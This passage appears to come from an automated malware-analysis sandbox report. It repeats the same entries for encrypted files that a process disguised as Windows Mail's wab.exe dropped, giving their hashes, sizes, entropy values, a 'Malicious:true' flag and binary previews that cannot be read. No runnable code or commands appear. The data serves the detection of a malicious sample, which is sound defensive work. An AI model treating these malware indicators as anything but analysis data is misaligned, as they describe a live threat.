                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174346
                                                                                Entropy (8bit):7.998880235577369
                                                                                Encrypted:true
                                                                                SSDEEP:3072:IzZs+py2tce+sVzfEc/CypDYlvCdpgVMSZ3YYK0WRmbBCnTBI/uNzfNzFrw/e7YU:IzZP7EbyNYIGVlMBq/uNDDr40qI
                                                                                MD5:1FC06F29D1B55DF69C81F82439B35F5D
                                                                                SHA1:747E5114BC5EAD48FF9C43C34C2AFB9B93E414AF
                                                                                SHA-256:C3E5B64F153386264969528B9036A366BFD0B852F8738E112E950110D54CF979
                                                                                SHA-512:D5DD18E3272E43DD5BCE77441F292ED482845F6050CC0D8AB9C9EB9CAD6725547561F75D41FE70AE55662124BD08D76EFB25F0B89CCB13D5F3E3E3BA53FD39C1
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174346
                                                                                Entropy (8bit):7.998880235577369
                                                                                Encrypted:true
                                                                                SSDEEP:3072:IzZs+py2tce+sVzfEc/CypDYlvCdpgVMSZ3YYK0WRmbBCnTBI/uNzfNzFrw/e7YU:IzZP7EbyNYIGVlMBq/uNDDr40qI
                                                                                MD5:1FC06F29D1B55DF69C81F82439B35F5D
                                                                                SHA1:747E5114BC5EAD48FF9C43C34C2AFB9B93E414AF
                                                                                SHA-256:C3E5B64F153386264969528B9036A366BFD0B852F8738E112E950110D54CF979
                                                                                SHA-512:D5DD18E3272E43DD5BCE77441F292ED482845F6050CC0D8AB9C9EB9CAD6725547561F75D41FE70AE55662124BD08D76EFB25F0B89CCB13D5F3E3E3BA53FD39C1
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
